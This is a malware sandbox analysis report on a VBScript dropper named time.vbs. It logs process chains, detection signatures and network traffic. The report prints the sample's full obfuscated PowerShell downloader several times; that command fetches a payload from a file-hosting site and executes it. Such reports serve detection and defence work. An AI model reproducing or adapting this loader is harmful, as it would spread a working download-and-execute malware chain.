              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb: source: powershell.exe, 00000004.00000002.2323976689.0000000008840000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ment.Automation.pdb source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2324570247.00000000088C6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbR source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: Joe Sandbox ViewIP Address: 69.31.136.57 69.31.136.57
              Source: Joe Sandbox ViewIP Address: 69.31.136.53 69.31.136.53
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /pro/dl/exw2o1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n4.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/dvbcvt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs12n1.sendspace.comConnection: Keep-AliveCookie: SID=kasl9f49sokivj0jd0u0img0e2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pro/dl/exw2o1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n4.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/dvbcvt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs12n1.sendspace.comConnection: Keep-AliveCookie: SID=kasl9f49sokivj0jd0u0img0e2
              Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs13n4.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs12n1.sendspace.com
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C30440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs13n4.sendspace.com
              Source: powershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C30409000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n4.sendspaX
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E75E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n4.sendspace.com
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E75A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C2E75E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30409000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n4.sendspace.com/dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp
              Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C2EDAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.2697536992.0000015C468F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.c
              Source: powershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/exw2o1P
              Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/exw2o1XR
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.4:49740 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_2656.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_6536.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6908
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6908
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6908Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6908Jump to behavior
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCing
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7EC8561_2_00007FFD9B7EC856
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7ED6021_2_00007FFD9B7ED602
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08690C984_2_08690C98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_086915684_2_08691568
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_086909504_2_08690950
              Source: time.vbsInitial sample: Strings found which are bigger than 50
              Source: amsi64_2656.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_6536.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@13/9@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Omrystninger.DimJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5 ` `
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ipzz4ah.drh.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2656
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6536
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCing
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 